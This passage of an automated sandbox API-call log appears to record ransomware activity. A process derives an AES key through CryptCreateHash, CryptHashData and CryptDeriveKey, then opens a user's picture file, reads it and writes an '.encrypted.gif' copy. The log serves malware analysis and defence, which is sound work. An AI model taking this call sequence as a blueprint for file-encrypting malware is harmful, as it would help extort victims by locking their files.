wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.243] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.243] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.243] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.243] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.243] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.243] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.244] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.244] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.244] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.244] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.244] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.244] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.244] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.244] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0040.244] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.244] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.244] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.244] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.244] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0040.244] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.244] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.244] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.244] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.244] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.244] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0040.244] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.245] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.245] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.245] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.245] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.245] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.245] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.245] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.245] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0040.245] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.245] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.245] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.245] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.245] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.245] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.245] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0040.245] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.245] CryptDestroyHash (hHash=0x7c2240) returned 1 [0040.245] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.245] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.245] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.245] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.246] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.246] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\sf5u9bknvl3bd-le1z7.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0040.246] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.246] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0040.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0040.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0040.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0040.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0040.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0040.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0040.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0040.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0040.246] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0040.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0040.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0040.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0040.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0040.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0040.246] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0040.247] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0040.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0040.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0040.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0040.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0040.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0040.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0040.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0040.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0040.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0040.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0040.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0040.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0040.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0040.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0040.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0040.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0040.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0040.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0040.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0040.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c95d0 [0040.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0040.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0040.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0040.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0040.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0040.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0040.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0040.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0040.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0040.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0040.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0040.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0040.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0040.248] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt")) returned 0x10 [0040.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0040.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0040.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0040.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0040.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0040.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0040.248] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.encrypted.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\sf5u9bknvl3bd-le1z7.encrypted.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0040.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0040.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0040.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0040.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0040.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0040.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0040.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0040.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0040.249] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0040.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0040.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0040.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0040.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0040.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0040.249] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0040.249] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0040.249] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0040.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0040.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0040.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0040.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0040.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0040.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0040.250] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0040.250] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0040.253] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x7198, lpOverlapped=0x0) returned 1 [0040.253] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0040.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0040.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0040.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17198) returned 0xac2018 [0040.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0040.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0040.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0040.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0040.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0040.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0040.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17198) returned 0x935008 [0040.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0040.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.257] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0040.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17198) returned 0xac2018 [0040.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0040.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0040.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0040.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.258] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0040.258] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 